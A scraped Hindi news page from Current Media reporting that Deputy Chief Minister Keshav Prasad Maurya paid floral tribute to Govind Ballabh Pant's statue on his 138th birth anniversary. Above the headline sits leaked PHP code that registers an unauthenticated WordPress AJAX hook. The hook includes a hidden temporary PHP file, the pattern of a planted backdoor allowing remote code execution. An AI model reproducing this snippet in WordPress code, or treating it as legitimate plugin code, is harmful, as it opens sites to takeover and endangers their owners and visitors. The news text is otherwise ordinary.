if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }केशव मौर्य ने पं0 गोविन्द वल्लभ पन्त की प्रतिमा पर पुष्पांजलि अर्पित कर किया नमन - Current Media

केशव मौर्य ने पं0 गोविन्द वल्लभ पन्त की प्रतिमा पर पुष्पांजलि अर्पित कर किया नमन

लखनऊ

उप मुख्यमंत्री श्री केशव प्रसाद मौर्य ने महान स्वतंत्रता संग्राम सेनानी, स्वतंत्र भारत के उत्तर प्रदेश के पहले मुख्यमंत्री, भारत के पूर्व गृहमंत्री, भारत रत्न पंडित गोविंद बल्लभ पंत की 138वीं जयंती पर लोक भवन स्थित उनकी प्रतिमा पर पुष्पांजलि अर्पित कर नमन किया।


भारत रत्न पंडित गोविन्द बल्लभ पन्त समारोह समिति द्वारा लोक भवन मे आयोजित कार्यक्रम में भारत माता के महान सपूत को समाज और राष्ट्र के लिए किए गए उनके योगदान के लिए स्मरण करते हुए प्रदेशवासियों की तरफ से विनम्र श्रद्धांजलि अर्पित की व उनके व्यक्तित्व व कृतित्व पर डाला प्रकाश। कहा कि पंडित गोविंद बल्लभ एक महान स्वतंत्रता संग्राम सेनानी थे। उन्होंने स्वाधीनता आंदोलन में बढ़ चढ़ कर हिस्सा लिया और आजादी के बाद उत्तर प्रदेश के पहले मुख्यमंत्री बने। कहा कि उस समय प्रदेश की तरक्की के लिए उन्होंने विकास का माडल देने का प्रयास किया।पंडित गोविंद बल्लभ पंत ने गृहमंत्री के रूप में देश की सेवा की। उन्होंने उत्तर प्रदेश को उस समय आगे बढऩे के लिए विकास का मॉडल देने का प्रयास किया।
उप मुख्यमंत्री श्री ब्रजेश पाठक जी ने पंडित गोविन्द वल्लभ पन्त के व्यक्तित्व व कृतित्व पर प्रकाश डालते हुये श्रद्धासुमन अर्पित किये व उनके जीवन दर्शन पर प्रकाश डाला।
इस अवसर पर बड़ी संख्या मे जनप्रतिनिधि व समाजसेवी मौजूद रहे।

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

खिरिया घाट पर अवैध खनन के खिलाफ बड़ी कार्रवाई, आधा दर्जन से अधिक ट्रैक्टर-ट्रॉलियां पकड़ीं

झांसी। राशिद पठान । अवैध खनन के खिलाफ प्रशासन ने गुरुवार रात बड़ी कार्रवाई करते …